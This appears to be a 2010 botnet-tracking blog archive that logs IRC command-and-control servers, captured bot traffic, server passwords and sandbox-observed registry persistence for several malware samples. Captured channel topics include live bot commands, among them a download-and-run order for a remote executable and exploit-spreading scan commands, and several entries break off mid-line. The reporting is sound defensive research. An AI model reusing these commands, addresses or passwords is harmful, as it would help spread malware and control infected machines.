Month: August 2010

ms4all.twoplayers.net

Remote Host                            Port Number
112.78.112.208                         80
218.5.74.190                           80
91.212.127.147                         80
204.45.85.210                          57221
54.59.85ae.static.theplanet.com        25
209.85.97.106                          25
65.55.92.152                           25
66.94.237.64                           25
70.87.6.99                             25

IRC traffic:
MODE #! -ix
MODE #Ma -ix
USER SP2-285 * 0 :COMPUTERNAME
MODE [N00_USA_XP_0571683] @ -ix
MODE #dpi -ix

channel: #dpi and #!
idle87 changes topic to '.asc -S|.asc exp_all 25 2 0 -a

212.95.45.107

Remote Host                            Port Number
212.95.45.107                          6567

IRC traffic:
NICK {XPUSA661553}
JOIN #kavtodio2
PONG fatalz.net
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA661553} -ix

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Services = "svchots.exe"
    so that svchots.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update = "%Temp%\svchots.exe"
    so that svchots.exe runs

88.255.104.171

Remote Host                            Port Number
88.255.104.171                         81

IRC traffic:
NICK [N00_USA_XP_5511946]
USER SP2-756 * 0 :COMPUTERNAME

* The following port was open in the system:
  Port     Protocol    Process
  1053     TCP         Zsnkspm.exe (%System%\Zsnkspm.exe)

Registry Modifications
* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
    + Microsoft Driver Setup

93.174.94.86

Remote Host                            Port Number
208.43.36.96                           80
93.174.94.86                           1234

IRC traffic:
PASS xxx
PONG 22
MOTD
NICK [USA|00|P|86953]
USER XP-0557 * 0 :COMPUTERNAME
MODE [USA|00|P|86953] -ix
JOIN #!wm! test

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Java developer Script Browse = "[file and pathname of the sample #1]"
    so that [file and pathname

onefucker.mine.nu

Resolved: [onefucker.mine.nu] To [203.153.116.155]

Remote Host                            Port Number
203.153.116.155                        6667

IRC traffic:
NICK UserName10
USER UserName10 "hotmail.com" "onefucker.mine.nu" :UserName
JOIN #spy chanpass
MODE UserName10 +i
MODE #spy +nts

Registry Modifications
* The following Registry Key was created:
  o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Winsock2 driver = "_1.EXE"
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    +

ms.mobilerequests.com (Butterfly bot again)

ms.mobilerequests.com – Unknown UDP Traffic: 89.149.223.140:1863
State: Normal establishment and termination
Transferred outbound Bytes: 76
Transferred inbound Bytes: 58

All results from the exe scan are here:
http://anubis.iseclab.org/?action=result&task_id=1952d1a31ce718b74b9557b86d5f9f90d&format=html#id369875

ff.fjpark.com (maybe another Mariposa botnet)

This bot uses a UDP protocol which is similar to Mariposa's, and the net is very large.

DNS Lookup
Host Name                              IP Address
dell-d3e62f7e26                        10.1.6.2
ff.fjpark.com                          98.126.180.250
208.53.183.124                         208.53.183.124
74.63.78.27                            74.63.78.27
208.53.183.92                          208.53.183.92

UDP Connections
Remote IP Address: 98.126.180.250    Port: 9955
Send Datagram: packet(s) of size 21
Send Datagram: 7 packet(s) of size 10
Send Datagram:

ms4all.twoplayers.net (very big botnet)

This one is special because you have to make some modifications to your IRC client to join the server.

ms4all.twoplayers.net DNS_TYPE_A
204.45.85.218
109.196.130.50
109.196.130.66
204.45.85.210

204.45.85.218:57221
PASS laorosr
Channel #dpi
Channel #!

Now talking in #!
Topic is '.asc -S|.http http://208.53.183.101/b.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20

80.247.72.130

Remote Host                            Port Number
80.247.72.130                          3305

IRC traffic:
PASS secretpass
NICK P|v403incrp
USER x6yyqf02y * 0 :USA|XP|257
USERHOST P|v403incrp
MODE P|v403incrp
JOIN #mm RSA

Other details
* The following ports were open in the system:
  Port     Protocol    Process
  69       UDP         unwise_.exe (%FontsDir%\unwise_.exe)
  1055     TCP         unwise_.exe (%FontsDir%\unwise_.exe)
  11030    TCP         unwise_.exe (%FontsDir%\unwise_.exe)

Registry Modifications
* The following Registry Keys

210.166.223.51

Remote Host                            Port Number
210.166.223.51                         3305

IRC traffic:
PASS secretpass
NICK P|b2s5zj80q
USER cb5tcxdf2 * 0 :USA|XP|373
USERHOST P|b2s5zj80q
MODE P|b2s5zj80q
JOIN #mm RSA

Other details
* The following ports were open in the system:
  Port     Protocol    Process
  69       UDP         unwise_.exe (%FontsDir%\unwise_.exe)
  1052     TCP         unwise_.exe (%FontsDir%\unwise_.exe)
  1138     TCP         unwise_.exe (%FontsDir%\unwise_.exe)
  1139     TCP         unwise_.exe (%FontsDir%\unwise_.exe)
  1140     TCP         unwise_.exe